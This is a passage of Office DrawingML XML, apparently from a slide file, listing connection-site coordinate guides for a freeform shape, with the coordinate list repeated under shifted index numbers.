              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 512991 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 499826 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 500327 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 464645 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 366598 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 295610 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 99441 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY132" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY133" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY134" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY135" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY136" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY137" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 512991 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 499826 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 500327 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 464645 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 366598 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 295610 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY132" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY133" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY134" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY135" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY136" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
